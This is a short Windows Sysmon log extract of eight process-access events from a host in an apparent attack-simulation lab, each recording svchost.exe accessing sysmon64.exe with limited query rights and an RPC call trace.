{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
